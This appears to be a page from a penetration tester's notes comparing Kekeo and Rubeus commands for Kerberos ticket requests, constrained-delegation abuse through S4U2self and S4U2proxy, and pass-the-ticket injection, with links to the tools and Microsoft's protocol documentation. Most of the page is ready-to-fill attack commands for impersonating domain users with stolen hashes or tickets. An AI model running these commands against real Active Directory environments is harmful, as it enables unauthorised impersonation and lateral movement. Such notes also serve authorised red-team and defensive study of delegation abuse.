kekeo/rubeus

Resources

  1. Rubeus

LogoGitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

  1. Kekeo

LogoGitHub - gentilkiwi/kekeo: A little toolbox to play with Microsoft Kerberos in CGitHub

  1. Service for User (S4U)

Logo[MS-SFU]: Kerberos Protocol Extensions: Service for User and Constrained Delegation ProtocolMicrosoftLearn

  1. S4U2self and S4U2proxy

Logo[MS-SFU]: S4U2selfMicrosoftLearn
Logo[MS-SFU]: S4U2proxyMicrosoftLearn

For each of the following sections, I aim to provide the equivalent commands in Kekeo and Rubeus (some of the sections may only have examples in one tool).

1. Request for Ticket Granting Ticket (TGT)

kekeo # tgt::ask /user:<user> /domain:<domain> /password:<password>
C:\> rubeus.exe asktgt /user:<user> /password:<password>

  • For rubeus, if /password is used instead of a hash, /enctype:X will default to RC4 for the exchange, with des|aes128|aes256 as options

2. Request for Ticket Granting Service (TGS)

C:\> rubeus.exe asktgs /ticket:<ticket> /service:<servicename>

3. Constrained delegation abuse: Service for User (S4U)

kekeo # tgs::s4u /tgt:<path_to_TGT> /user:<username> /service:<servicename>

The kekeo command listed above essentially performs the S4U2self and S4U2proxy steps that can be achieved with rubeus (refer below).

LogoGitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

From the Rubeus S4U documentation page link above, we can find a few examples:

a. S4U2self

C:\> rubeus.exe s4u /user:<username> /rc4:<rc4_hash> /impersonateuser:<user_to_impersonate>

  • /rc4: rc4 hash of the user associated with /user

    • The TGT for an account with a msds-allowedtodelegateto permission can be used instead (/ticket:X)

  • /impersonateuser : compulsory parameter to specify the user we plan to obtain a service ticket on behalf for

From this command, we will obtain the following:

  1. A TGT for the user specified in /user

  2. A TGS for the user specified in /impersonateuser

  • Using the S4U2self extension: the service account can use the TGS obtained to authenticate to itself (or more specifically, the service it is running) on behalf of the user specified in /impersonateuser

b. S4U2proxy

C:\> rubeus.exe s4u /ticket:<TGT> /msdsspn:<SPN> /tgs:<TGS>

  • /ticket : TGT obtained from the previous step

  • /mdsspn : Service Principal Name (SPN)

    • This value must be listed under the msds-allowedtodelegateto property for the service account (supplied to the /user field in the previous step)

  • /tgs : The forwardable ticket retrieved from the previous step (S4U2self ticket for the user specified in /impersonateuser)

From this command, we obtain a TGS for the impersonated user (specified in /impersonateuser) to the service defined in /msdsspn.

Next, we can use the TGS we have obtained to authenticate to the service (defined in /mdsspn) as our desired user:

LogoGitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub
C:\> rubeus.exe ptt /ticket:TGS

or by supplying the /ptt flag to the s4u command.

C. Combining all steps: TGT request, S4U2self process, S4U2proxy execution and pass-the-ticket (injection of the final ticket)

C:\> rubeus.exe s4u /user:<username> /rc4:<rc4_hash> /impersonateuser:<user_to_impersonate> /msdsspn:<SPN> /ptt
Previoussekurlsa::pthNextLazagne

Last updated